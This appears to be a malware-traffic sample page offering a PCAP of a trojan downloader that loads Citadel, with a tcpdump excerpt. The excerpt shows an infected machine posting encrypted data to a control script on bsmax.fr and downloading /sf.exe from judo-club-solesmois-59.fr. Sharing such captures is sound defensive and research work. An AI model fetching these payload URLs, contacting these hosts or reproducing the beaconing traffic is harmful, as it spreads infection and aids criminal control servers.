DLL.exe Trojan Downloader Loads Citadel and Unknown Malware PCAP file download

Download Attachments

  • 1 pcap dll
    Citadel
    Date added: September 24, 2016 4:33 am Added by: admin File size: 488 KB Downloads: 85

DLL.exe Trojan Downloader Loads Citadel and Unknown Malware PCAP file download
2016-09-20 02:28:08.567628 IP 192.168.1.102.58384 > 213.186.33.19.80: Flags [P.], seq 0:694, ack 1, win 256, length 694: HTTP: POST /misc/.KhJh2M@/.KhJh2M@//framework.php HTTP/1.1
E…st………f..!….P..(…d.P…~…POST /misc/.KhJh2M@/.KhJh2M@//framework.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: bsmax.fr
Content-Length: 415
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: 60gpBAK=R1224197954; 60gp=R1864059519

8.,…….@M0..GH.#..RS..
..g.2..g…;…yLb…..]\..p..4…..Qo..t..Ba……..N..\.p’~.X.o.}z*…[…jA…L…#..T……..hq.$.zx[……!..Z.{D4.o.r..~)..z?.M.h.%……,.`O…=bpI}..V/UJ._XX..0v9..C.d.b…3..f.{}…………..i1…Y…<….5IR&.”…9EX\.h..X.f…Z..*.)Q.1…k?tf#[@.^..W…….+.J..Rg…..}….2…y..:…;..I;…,…..H.}….{8..,…&#(*.Pp…*…#..I…7.Y2..L.m…./…a…8…………….a.2.
2016-09-20 02:28:08.854990 IP 192.168.1.102.51387 > 75.75.75.75.53: 10218+ A? judo-club-solesmois-59.fr. (43)
E..G,……~…fKKKK…5.39]’…………judo-club-solesmois-59.fr…..
2016-09-20 02:28:08.894800 IP 192.168.1.102.58384 > 213.186.33.19.80: Flags [.], ack 407, win 255, length 0
E..(su………f..!….P..*…e.P…?G……..
2016-09-20 02:28:09.049012 IP 192.168.1.102.58385 > 213.186.33.3.80: Flags [S], seq 1303459062, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4jM@……..f..!….PM.4……. ./;…………..
2016-09-20 02:28:09.159956 IP 192.168.1.102.58385 > 213.186.33.3.80: Flags [.], ack 1235911303, win 256, length 0
E..(jN………f..!….PM.4.I…P………….
2016-09-20 02:28:09.160558 IP 192.168.1.102.58385 > 213.186.33.3.80: Flags [P.], seq 0:191, ack 1, win 256, length 191: HTTP: GET /sf.exe HTTP/1.1
E…jO………f..!….PM.4.I…P…|…GET /sf.exe HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: judo-club-solesmois-59.fr
Cache-Control: no-cache

Leave a Reply